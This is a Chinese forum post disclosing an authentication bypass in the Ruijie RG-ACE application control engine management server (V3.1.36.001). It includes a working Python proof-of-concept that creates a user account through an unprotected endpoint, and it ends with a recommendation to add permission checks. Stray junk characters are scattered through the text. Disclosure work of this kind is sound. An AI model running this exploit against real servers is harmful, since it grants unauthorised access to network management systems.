找回密码
 立即注册
查看: 2786|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
& x- E$ ?! J4 s+ `; m5 v% Z, e) J# [5 R& Y4 _+ @

9 ]5 Y% j( J1 L4 m: d测试的具体版本是1 [1 C% o% b! J: i+ i/ V
产品名称: 锐捷应用控制引擎4 {, V  a, G4 g1 B. R8 |% [4 s" M
版本号: 3.1.36.001 TC
4 W* ?, e7 _7 }; R5 Y9 A: b3 [编译时间: 201104291730
8 a/ L! M7 ]2 [. R4 e % N7 o  j# D* S, f0 |

. l, h7 b+ z" M漏洞证明:
4 }5 S' H" w2 D: b7 ~, [ " \; r% Y" y5 Y8 D$ M
9 [; _; Q* W1 ~) }& @9 E' d

7 h' t1 U4 G4 ?$ c* C/ S% B+ w6 d
% e1 c7 m: i' L2 f' I

/ \, p( S0 u2 V$ n4 F4 O执行脚本. g2 y8 [5 j4 w: D
#! /usr/bin/env python& h6 K3 u) `$ O# ^, ?# y
#coding=gbk+ b5 a3 @( f" C. v+ O, s' O/ K
#RG-ACE管理服务器 V3.1.36.001( @; c' K, U9 z2 i; z
import urllib2, urllib,cookielib$ {; F1 l7 H( P. s! B# M0 |8 O
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
5 p+ E2 ~6 }* B" }" x$ l5 d: Topener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))  N  e4 b1 B: T$ [1 @5 F9 z8 s
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]& T* E! f" f1 Z0 ~0 H1 s: s: b  @* Q
post=(("event","userManager.doInsertUserInfo"),
3 _8 C2 O# M5 T4 s6 ]("useractionname","addButtonValue"),
5 u2 |8 y" k1 I) v! F2 V) {("useropermanager","userManager"),: V' d: R* ^2 {& {$ w% k
("userName","t"), #######账号自己加
) ]) ^3 ?: Y% T+ t9 Z$ d1 J("pwd","aaaaaa"),######密码自己加: a# p/ r3 P2 \4 I
("trueName","ad"),  J( T+ e! S+ Y( A0 d
("email",""),3 ~% ~, J! ~% U+ Z4 @/ ]
("mobilePhone",""),
- J+ N0 k* A3 O$ v("officePhone",""),; r2 q/ A5 U* t( _
("addr",""),
! Q/ [# m: F2 v("submit","确定"))3 F' n! O! D' c; x4 U
urllib2.install_opener(opener)& ^5 u, [5 r1 |7 V: z# f
p=urllib2.urlopen(url, urllib.urlencode(post)).read()# f$ _" J/ S& z$ z
print "Done"
- O) ?. z; W1 k2 N% z7 w9 C
" _0 B" ?- v1 I+ [9 s登录,连接设备- H6 Z( f; P% M% m) ^

; A: _8 |! K' H3 T9 j& i0 C* p5 }
, \7 k% Q$ H9 k6 G- c: n) P, s
5 ^4 _$ ]8 w* W2 u
1 U! \( ?8 h8 {2 F
( Y& A& ~' Z; Y5 C默认的管理员admin权限更大点( w* g5 G5 M( r3 v

6 H2 s7 r  c9 g/ E7 G4 E0 L7 M* @
) p+ h* d9 `/ e; }/ \) D! u
1 {% k/ C! w3 J
5 s$ i9 v, t3 |7 n1 X' }( _  }8 l; U4 Y& W+ B2 t
修复方案:0 p  X4 E& b4 c. S+ e  ?
加强对接口的权限验证# U- |* [+ v0 `5 j% o( v$ W
! L6 |- E# n# O0 V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表